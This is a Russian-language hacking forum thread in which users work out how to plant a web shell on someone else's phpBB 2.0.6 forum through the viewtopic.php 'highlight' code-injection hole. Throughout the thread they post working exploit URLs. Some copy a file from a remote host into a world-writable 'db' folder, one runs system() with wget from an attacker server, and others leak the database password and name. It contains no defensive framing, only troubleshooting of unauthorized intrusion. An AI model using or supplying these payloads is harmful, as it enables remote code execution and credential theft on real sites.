какая команда на запись в другую папку.(отличную от корневой напр. "forum)"


расcказываю как есть...
на одном форуме есть папка доступная к записыванию эта папка называется db

ВОПРОС:
как залить туда шелл, использую эту уязвимость
viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файла&t=1&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527

- как я понимаю эта команда для записи в корневую папку.

форум phpBB 2.0.6

Уважаемые, только не молчите.

Для начала зделай cd <путь>, а вот потом уж заливай!
Что-то типа:
viewtopic.php?xxx=cd <путь>;wget <адрес твоего ремоута>&t=1&highlight=%2527.system($_GET[xxx]).include%2527

нет, illusion
что-то не подходит, мне кажется ты не втом порядке записал.

хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?

хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?

нет не так.. ищи папку в которую запись разрешена.. или хотя бы файл в который можно писать...

admin drwxr-xr-x
cache drwxr-xr-x
db drwxrwxrwx
docs drwxr-xr-x
images drwxr-xr-x
includes drwxr-xr-x
language drwxr-xr-x
templates drwxr-xr-x
common.php -rw-r--r--
config.php -rwxrwxrwx

пишу,

viewtopic.php?a=http://www.hot.ee/vega2k/1.hp&b=&b=/db/dhelp.php&t=44&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527

и ни чего не выходит, не записывается.

а вот на другом форуме, где есть доступ на запись в саму папку форума, я могу и вдругие папки записывать, которые находяться не в папке форума а чуть выше (по дереву)

А какой командой можно посмтатреть какие папки открыты на запись???

vega2k так может та команда что ты пишешь не работает просто на сервере?

2onyx3 Вот этой ls -l

Егорыч+++, хех, возможно...

&highlight=%2527.$poster=$dbpasswd.%2527 -пасс от базы
&highlight=%2527.$poster=$dbname.%2527-имя базы

29.12.2004, 16:30
Shtirlic, поднимать старые темы стало модным?

а как залить шелл если на сервере нет wget'a?